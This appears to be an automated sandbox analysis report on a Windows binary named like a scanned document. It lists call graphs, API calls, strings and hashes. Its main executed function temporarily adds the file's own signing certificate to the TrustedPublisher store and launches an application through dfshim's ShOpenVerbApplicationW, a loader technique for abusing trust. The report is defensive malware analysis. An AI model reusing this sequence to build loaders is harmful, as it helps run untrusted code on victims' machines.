8347f9 _free 15 API calls 6805->6806 6810 8375d5 _ValidateLocalCookies 6805->6810 6807 8375b2 6806->6807 6808 83473d _abort 21 API calls 6807->6808 6809 8375bd _ValidateLocalCookies 6808->6809 5835 833eb5 5836 833eb8 5835->5836 5837 833f24 _abort 33 API calls 5836->5837 5838 833ec4 5837->5838 6101 831ff4 6104 832042 6101->6104 6105 831fff 6104->6105 6106 83204b 6104->6106 6106->6105 6107 8323c3 43 API calls 6106->6107 6108 832086 6107->6108 6109 8323c3 43 API calls 6108->6109 6110 832091 6109->6110 6111 833e89 33 API calls 6110->6111 6112 832099 6111->6112 5839 8348bb 5840 8348cb 5839->5840 5849 8348e1 5839->5849 5841 8347f9 _free 15 API calls 5840->5841 5842 8348d0 5841->5842 5843 83473d _abort 21 API calls 5842->5843 5846 8348da 5843->5846 5844 83494b 5869 8331ec 5844->5869 5848 8349b9 5850 834869 _free 15 API calls 5848->5850 5849->5844 5852 834a2c 5849->5852 5858 834a4b 5849->5858 5850->5852 5851 8349b0 5851->5848 5855 834a3e 5851->5855 5875 8379bb 5851->5875 5884 834c65 5852->5884 5856 83474d _abort 6 API calls 5855->5856 5857 834a4a 5856->5857 5859 834a57 5858->5859 5859->5859 5860 83480c _abort 15 API calls 5859->5860 5861 834a85 5860->5861 5862 8379bb 21 API calls 5861->5862 5863 834ab1 5862->5863 5864 83474d _abort 6 API calls 5863->5864 5865 834ae0 _abort 5864->5865 5866 834b81 FindFirstFileExA 5865->5866 5867 834bd0 5866->5867 5868 834a4b 21 API calls 5867->5868 5870 833201 5869->5870 5871 8331fd 5869->5871 5870->5871 5872 83480c _abort 15 API calls 5870->5872 5871->5851 5873 83322f 5872->5873 5874 834869 _free 15 API calls 5873->5874 5874->5871 5877 83790a 5875->5877 5876 83791f 5878 8347f9 _free 15 API calls 5876->5878 5879 837924 5876->5879 5877->5876 5877->5879 5881 83795b 5877->5881 5883 83794a 5878->5883 5879->5851 5880 83473d _abort 21 API calls 5880->5879 5881->5879 5882 8347f9 _free 15 API calls 5881->5882 5882->5883 5883->5880 5885 834c6f 5884->5885 5886 834c7f 5885->5886 5887 834869 _free 15 API calls 5885->5887 5888 834869 _free 15 API calls 5886->5888 5887->5885 5889 834c86 5888->5889 5889->5846 5890 8314bb IsProcessorFeaturePresent 5891 8314d0 5890->5891 5894 831493 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 5891->5894 5893 8315b3 5894->5893 6113 8312fb 6118 831aac SetUnhandledExceptionFilter 6113->6118 6115 831300 6119 8338f9 6115->6119 6117 83130b 6118->6115 6120 833905 6119->6120 6121 83391f 6119->6121 6120->6121 6122 8347f9 _free 15 API calls 6120->6122 6121->6117 6123 83390f 6122->6123 6124 83473d _abort 21 API calls 6123->6124 6125 83391a 6124->6125 6125->6117 5895 831ab8 5896 831aef 5895->5896 5897 831aca 5895->5897 5897->5896 5904 83209a 5897->5904 5916 8323c3 5904->5916 5907 8320a3 5908 8323c3 43 API calls 5907->5908 5909 831b06 5908->5909 5910 833e89 5909->5910 5911 833e95 _abort 5910->5911 5912 834424 _abort 33 API calls 5911->5912 5915 833e9a 5912->5915 5913 833f24 _abort 33 API calls 5914 833ec4 5913->5914 5915->5913 5930 8323d1 5916->5930 5918 8323c8 5919 831afc 5918->5919 5920 836b14 _abort 2 API calls 5918->5920 5919->5907 5921 833f29 5920->5921 5922 833f35 5921->5922 5923 836b6f _abort 33 API calls 5921->5923 5924 833f5c 5922->5924 5925 833f3e IsProcessorFeaturePresent 5922->5925 5923->5922 5927 833793 _abort 23 API calls 5924->5927 5926 833f49 5925->5926 5928 834573 _abort 3 API calls 5926->5928 5929 833f66 5927->5929 5928->5924 5931 8323da 5930->5931 5932 8323dd GetLastError 5930->5932 5931->5918 5942 8326a4 5932->5942 5935 832457 SetLastError 5935->5918 5936 8326df ___vcrt_FlsSetValue 6 API calls 5937 83240b 5936->5937 5938 832433 5937->5938 5939 8326df ___vcrt_FlsSetValue 6 API calls 5937->5939 5941 832411 5937->5941 5940 8326df ___vcrt_FlsSetValue 6 API calls 5938->5940 5938->5941 5939->5938 5940->5941 5941->5935 5943 832543 ___vcrt_InitializeCriticalSectionEx 5 API calls 5942->5943 5944 8326be 5943->5944 5945 8326d6 TlsGetValue 5944->5945 5946 8323f2 5944->5946 5945->5946 5946->5935 5946->5936 5946->5941 6577 83383f 6578 83384b ___scrt_is_nonwritable_in_current_image 6577->6578 6580 833882 _abort 6578->6580 6585 8356e2 EnterCriticalSection 6578->6585 6581 83385f 6582 8367cb __fassign 15 API calls 6581->6582 6583 83386f 6582->6583 6586 833888 6583->6586 6585->6581 6589 83572a LeaveCriticalSection 6586->6589 6588 83388f 6588->6580 6589->6588

                                                                                                                                                                                                                                                                          Executed Functions

                                                                                                                                                                                                                                                                          Function 00831000 Relevance: 54.4, APIs: 27, Strings: 4, Instructions: 199encryptionmemorylibraryCOMMON
                                                                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • LocalAlloc.KERNEL32(00000000,00000104), ref: 00831016
                                                                                                                                                                                                                                                                          • GetModuleFileNameW.KERNEL32(00000000,00000000,00000104), ref: 00831025
                                                                                                                                                                                                                                                                          • CertOpenSystemStoreA.CRYPT32(00000000,TrustedPublisher), ref: 00831032
                                                                                                                                                                                                                                                                          • LocalAlloc.KERNELBASE(00000000,00040000), ref: 00831057
                                                                                                                                                                                                                                                                          • LocalAlloc.KERNEL32(00000000,00040000), ref: 00831063
                                                                                                                                                                                                                                                                          • CryptQueryObject.CRYPT32(00000001,00000000,00000400,00000002,00000000,00000000,00000000,00000000,00000000,?,00000000), ref: 00831082
                                                                                                                                                                                                                                                                          • CryptMsgGetParam.CRYPT32(?,0000000B,00000000,?,?), ref: 008310B2
                                                                                                                                                                                                                                                                          • LocalAlloc.KERNEL32(00000000,?), ref: 008310C5
                                                                                                                                                                                                                                                                          • LocalAlloc.KERNEL32(00000000,00002000), ref: 008310F4
                                                                                                                                                                                                                                                                          • CryptMsgGetParam.CRYPT32(?,0000000C,00000000,00000000,00002000), ref: 0083110A
                                                                                                                                                                                                                                                                          • CertCreateCertificateContext.CRYPT32(00000001,00000000,00002000), ref: 0083111A
                                                                                                                                                                                                                                                                          • CertAddCertificateContextToStore.CRYPT32(?,00000000,00000001,00000000), ref: 0083112D
                                                                                                                                                                                                                                                                          • CertFreeCertificateContext.CRYPT32(00000000), ref: 00831134
                                                                                                                                                                                                                                                                          • LocalFree.KERNEL32(00000000), ref: 0083113E
                                                                                                                                                                                                                                                                          • LocalFree.KERNEL32(00000000), ref: 0083115D
                                                                                                                                                                                                                                                                          • CryptMsgGetParam.CRYPT32(?,00000009,00000000,00000000,00040000), ref: 0083116E
                                                                                                                                                                                                                                                                          • CryptMsgGetParam.CRYPT32(?,0000000A,00000000,?,00040000), ref: 00831182
                                                                                                                                                                                                                                                                          • CertFindAttribute.CRYPT32(1.3.6.1.4.1.311.4.1.1,00000000,?), ref: 00831198
                                                                                                                                                                                                                                                                          • CertFindAttribute.CRYPT32(1.3.6.1.4.1.311.4.1.1,?,?), ref: 008311A9
                                                                                                                                                                                                                                                                          • LoadLibraryA.KERNELBASE(dfshim), ref: 008311BA
                                                                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,ShOpenVerbApplicationW), ref: 008311C6
                                                                                                                                                                                                                                                                          • Sleep.KERNELBASE(00009C40), ref: 008311E8
                                                                                                                                                                                                                                                                          • CertDeleteCertificateFromStore.CRYPT32(?), ref: 0083120B
                                                                                                                                                                                                                                                                          • CertCloseStore.CRYPT32(?,00000000), ref: 0083121A
                                                                                                                                                                                                                                                                          • LocalFree.KERNEL32(?), ref: 00831223
                                                                                                                                                                                                                                                                          • LocalFree.KERNEL32(?), ref: 00831228
                                                                                                                                                                                                                                                                          • LocalFree.KERNEL32(?), ref: 0083122D
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2219932713.0000000000831000.00000020.00000001.01000000.00000003.sdmp, Offset: 00830000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2219912969.0000000000830000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2219949817.000000000083B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2219971981.0000000000841000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2219993521.0000000000843000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_830000_Scan_doc_09_16_24_1120.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: Local$Cert$Free$AllocCrypt$CertificateParamStore$Context$AttributeFind$AddressCloseCreateDeleteFileFromLibraryLoadModuleNameObjectOpenProcQuerySleepSystem
                                                                                                                                                                                                                                                                          • String ID: 1.3.6.1.4.1.311.4.1.1$ShOpenVerbApplicationW$TrustedPublisher$dfshim
                                                                                                                                                                                                                                                                          • API String ID: 335784236-860318880
                                                                                                                                                                                                                                                                          • Opcode ID: 571c1e88af91253298dc4e7ded44eef01c53f1655e64d4f653be67600daa93ee
                                                                                                                                                                                                                                                                          • Instruction ID: 3feae03af8a6cba2bfe753a5534caab866dedf190f7039afb631517176fe5970
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 571c1e88af91253298dc4e7ded44eef01c53f1655e64d4f653be67600daa93ee
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: B2615EB1A40218AFEF259B95DC99FAFBBB5FF88B50F100415FB14B7290C77199018BA4

                                                                                                                                                                                                                                                                          Non-executed Functions

                                                                                                                                                                                                                                                                          Function 0083191F Relevance: 6.1, APIs: 4, Instructions: 70COMMON
                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • IsProcessorFeaturePresent.KERNEL32(00000017,?), ref: 0083192B
                                                                                                                                                                                                                                                                          • IsDebuggerPresent.KERNEL32 ref: 008319F7
                                                                                                                                                                                                                                                                          • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00831A10
                                                                                                                                                                                                                                                                          • UnhandledExceptionFilter.KERNEL32(?), ref: 00831A1A
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2219932713.0000000000831000.00000020.00000001.01000000.00000003.sdmp, Offset: 00830000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2219912969.0000000000830000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2219949817.000000000083B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2219971981.0000000000841000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2219993521.0000000000843000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_830000_Scan_doc_09_16_24_1120.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID: 254469556-0
                                                                                                                                                                                                                                                                          • Opcode ID: e96e9e8a0ede92a45705f526f39bd9b7c230e02f198869970ac566c37e918f1c
                                                                                                                                                                                                                                                                          • Instruction ID: ed15d7fc8da40ed244084ddff3a7227989b5c8d4a9feab30a1b57c2d368293b0
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: e96e9e8a0ede92a45705f526f39bd9b7c230e02f198869970ac566c37e918f1c
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: D0312AB5D052189BDF20DF64D9497CDBBB8FF48700F1041AAE50CAB250EB749A84CF85
                                                                                                                                                                                                                                                                          Function 00834573 Relevance: 4.6, APIs: 3, Instructions: 78COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • IsDebuggerPresent.KERNEL32(?,?,?,?,?,00000000), ref: 0083466B
                                                                                                                                                                                                                                                                          • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 00834675
                                                                                                                                                                                                                                                                          • UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,00000000), ref: 00834682
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2219932713.0000000000831000.00000020.00000001.01000000.00000003.sdmp, Offset: 00830000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2219912969.0000000000830000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2219949817.000000000083B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2219971981.0000000000841000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2219993521.0000000000843000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_830000_Scan_doc_09_16_24_1120.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID: 3906539128-0
                                                                                                                                                                                                                                                                          • Opcode ID: 081757ee8f7c0ac69f68a21ecec402815a3a6056e39bcab0d1b202088045b12b
                                                                                                                                                                                                                                                                          • Instruction ID: f0e4850efc7083f00cff08fbb04caedf1c9df1dbc65fa1279376e31d7890befe
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 081757ee8f7c0ac69f68a21ecec402815a3a6056e39bcab0d1b202088045b12b
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 6631D4749012189BCB25DF68DD89B8DBBB8FF48710F5041EAE41CA7250EB709F858F85
                                                                                                                                                                                                                                                                          Function 00833677 Relevance: 4.5, APIs: 3, Instructions: 20COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • GetCurrentProcess.KERNEL32(?,?,0083364D,?,008402E0,0000000C,008337A4,?,00000002,00000000,?,00833F66,00000003,0083209F,00831AFC), ref: 00833698
                                                                                                                                                                                                                                                                          • TerminateProcess.KERNEL32(00000000,?,0083364D,?,008402E0,0000000C,008337A4,?,00000002,00000000,?,00833F66,00000003,0083209F,00831AFC), ref: 0083369F
                                                                                                                                                                                                                                                                          • ExitProcess.KERNEL32 ref: 008336B1
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2219932713.0000000000831000.00000020.00000001.01000000.00000003.sdmp, Offset: 00830000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2219912969.0000000000830000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2219949817.000000000083B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2219971981.0000000000841000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2219993521.0000000000843000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_830000_Scan_doc_09_16_24_1120.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: Process$CurrentExitTerminate
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID: 1703294689-0
                                                                                                                                                                                                                                                                          • Opcode ID: 2d55e89f555a8b8c2ca52756f707b8e388c33df7675ae7ffdc52dd159dd238d3
                                                                                                                                                                                                                                                                          • Instruction ID: 1539a4f2e283b3318efe401f7d3d6a9974add48ab4804ae3276af89f15af0639
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 2d55e89f555a8b8c2ca52756f707b8e388c33df7675ae7ffdc52dd159dd238d3
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 7BE0B6B1010948AFCF15AF58DE1AA5A3B69FFD0355F004814FA559A232EB35DE42DA90
                                                                                                                                                                                                                                                                          Function 00834A4B Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 114COMMON
                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2219932713.0000000000831000.00000020.00000001.01000000.00000003.sdmp, Offset: 00830000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2219912969.0000000000830000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2219949817.000000000083B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2219971981.0000000000841000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2219993521.0000000000843000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_830000_Scan_doc_09_16_24_1120.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                          • String ID: .
                                                                                                                                                                                                                                                                          • API String ID: 0-248832578
                                                                                                                                                                                                                                                                          • Opcode ID: 58e6a35a09c457028a4c4814c3a8aa95ddc201b3a7e0dcce4200356f52e367c5
                                                                                                                                                                                                                                                                          • Instruction ID: 90ae34cef501a768d7e7236e865035fae906427d4c05ac2bd8c406a5c412a01b
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 58e6a35a09c457028a4c4814c3a8aa95ddc201b3a7e0dcce4200356f52e367c5
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 12310471800209ABCB249EB8CC84EFABBBDFBC6314F0051A8F518D7251E630ED448B90
                                                                                                                                                                                                                                                                          Function 0083A495 Relevance: 1.8, APIs: 1, Instructions: 269COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,0083A490,?,?,00000008,?,?,0083A130,00000000), ref: 0083A6C2
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2219932713.0000000000831000.00000020.00000001.01000000.00000003.sdmp, Offset: 00830000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2219912969.0000000000830000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2219949817.000000000083B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2219971981.0000000000841000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2219993521.0000000000843000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_830000_Scan_doc_09_16_24_1120.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: ExceptionRaise
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID: 3997070919-0
                                                                                                                                                                                                                                                                          • Opcode ID: ae4f81d8e5e66393e29dbfbc6b3ea899c5775687a87bd1afa6a7fdc1e4e31c64
                                                                                                                                                                                                                                                                          • Instruction ID: 7280957ce33d5cef8817c4fe4ab371c404138ca38f60dc062df2a03cd7c067fa
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: ae4f81d8e5e66393e29dbfbc6b3ea899c5775687a87bd1afa6a7fdc1e4e31c64
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: EBB13D75610608DFD719CF28C48AB657BE0FF85364F298658E8DACF2A1C335D992CB81
                                                                                                                                                                                                                                                                          Function 00831BD4 Relevance: 1.6, APIs: 1, Instructions: 147COMMON
                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 00831BEA
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2219932713.0000000000831000.00000020.00000001.01000000.00000003.sdmp, Offset: 00830000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2219912969.0000000000830000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2219949817.000000000083B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2219971981.0000000000841000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2219993521.0000000000843000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_830000_Scan_doc_09_16_24_1120.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: FeaturePresentProcessor
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID: 2325560087-0
                                                                                                                                                                                                                                                                          • Opcode ID: b0399220dd6c8bf07b9c65b5e4d1154dbc1cb9f992591324da7429b08983c3b4
                                                                                                                                                                                                                                                                          • Instruction ID: 0dde5a3974f5a0bd4bc44481f8c5e45213146eb410759b954dcdc243b22a2725
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: b0399220dd6c8bf07b9c65b5e4d1154dbc1cb9f992591324da7429b08983c3b4
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: C9517CB5E106058FEF15CF69D8897AEBBF0FB89750F24842AD405EB290D7749981CF90
                                                                                                                                                                                                                                                                          Function 00831AAC Relevance: 1.5, APIs: 1, Instructions: 3COMMON
                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • SetUnhandledExceptionFilter.KERNEL32(Function_00001AB8,00831300), ref: 00831AB1
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2219932713.0000000000831000.00000020.00000001.01000000.00000003.sdmp, Offset: 00830000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2219912969.0000000000830000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2219949817.000000000083B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2219971981.0000000000841000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2219993521.0000000000843000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_830000_Scan_doc_09_16_24_1120.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: ExceptionFilterUnhandled
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID: 3192549508-0
                                                                                                                                                                                                                                                                          • Opcode ID: 044527cae7d7e6d74c3dc42117e8e7226b5ba5dbd14f373ffdef468ea5882443
                                                                                                                                                                                                                                                                          • Instruction ID: 2b383102c972e64adf5570814072ea965e4d41fa11b2eca79549b2fd56b2ad0f
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 044527cae7d7e6d74c3dc42117e8e7226b5ba5dbd14f373ffdef468ea5882443
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash:
                                                                                                                                                                                                                                                                          Function 00836893 Relevance: 1.3, APIs: 1, Instructions: 5memoryCOMMON
                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2219932713.0000000000831000.00000020.00000001.01000000.00000003.sdmp, Offset: 00830000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2219912969.0000000000830000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2219949817.000000000083B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2219971981.0000000000841000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2219993521.0000000000843000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_830000_Scan_doc_09_16_24_1120.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: HeapProcess
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID: 54951025-0
                                                                                                                                                                                                                                                                          • Opcode ID: ce928809af104e2141df6c909f37af44e2abb7ef02206aa9d5e46f7146e58843
                                                                                                                                                                                                                                                                          • Instruction ID: c03dbdd9ade622bcd014a77922b17ec1b3ac84d06584486c9ae2983410a7862d
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: ce928809af104e2141df6c909f37af44e2abb7ef02206aa9d5e46f7146e58843
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 51A022B0300202CF8300CF30AF8A30C3BECBAC2AC0B020828B208C0030EB308080FF02
                                                                                                                                                                                                                                                                          Function 00836507 Relevance: 19.6, APIs: 13, Instructions: 114COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                                                          control_flow_graph 81 836507-83651b 82 836589-836591 81->82 83 83651d-836522 81->83 85 836593-836596 82->85 86 8365d8-8365f0 call 83667a 82->86 83->82 84 836524-836529 83->84 84->82 87 83652b-83652e 84->87 85->86 89 836598-8365d5 call 834869 * 4 85->89 95 8365f3-8365fa 86->95 87->82 90 836530-836538 87->90 89->86 93 836552-83655a 90->93 94 83653a-83653d 90->94 100 836574-836588 call 834869 * 2 93->100 101 83655c-83655f 93->101 94->93 97 83653f-836551 call 834869 call 836078 94->97 98 836619-83661d 95->98 99 8365fc-836600 95->99 97->93 109 836635-836641 98->109 110 83661f-836624 98->110 105 836602-836605 99->105 106 836616 99->106 100->82 101->100 107 836561-836573 call 834869 call 836176 101->107 105->106 114 836607-836615 call 834869 * 2 105->114 106->98 107->100 109->95 112 836643-836650 call 834869 109->112 117 836632 110->117 118 836626-836629 110->118 114->106 117->109 118->117 125 83662b-836631 call 834869 118->125 125->117
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • ___free_lconv_mon.LIBCMT ref: 0083654B
                                                                                                                                                                                                                                                                            • Part of subcall function 00836078: _free.LIBCMT ref: 00836095
                                                                                                                                                                                                                                                                            • Part of subcall function 00836078: _free.LIBCMT ref: 008360A7
                                                                                                                                                                                                                                                                            • Part of subcall function 00836078: _free.LIBCMT ref: 008360B9
                                                                                                                                                                                                                                                                            • Part of subcall function 00836078: _free.LIBCMT ref: 008360CB
                                                                                                                                                                                                                                                                            • Part of subcall function 00836078: _free.LIBCMT ref: 008360DD
                                                                                                                                                                                                                                                                            • Part of subcall function 00836078: _free.LIBCMT ref: 008360EF
                                                                                                                                                                                                                                                                            • Part of subcall function 00836078: _free.LIBCMT ref: 00836101
                                                                                                                                                                                                                                                                            • Part of subcall function 00836078: _free.LIBCMT ref: 00836113
                                                                                                                                                                                                                                                                            • Part of subcall function 00836078: _free.LIBCMT ref: 00836125
                                                                                                                                                                                                                                                                            • Part of subcall function 00836078: _free.LIBCMT ref: 00836137
                                                                                                                                                                                                                                                                            • Part of subcall function 00836078: _free.LIBCMT ref: 00836149
                                                                                                                                                                                                                                                                            • Part of subcall function 00836078: _free.LIBCMT ref: 0083615B
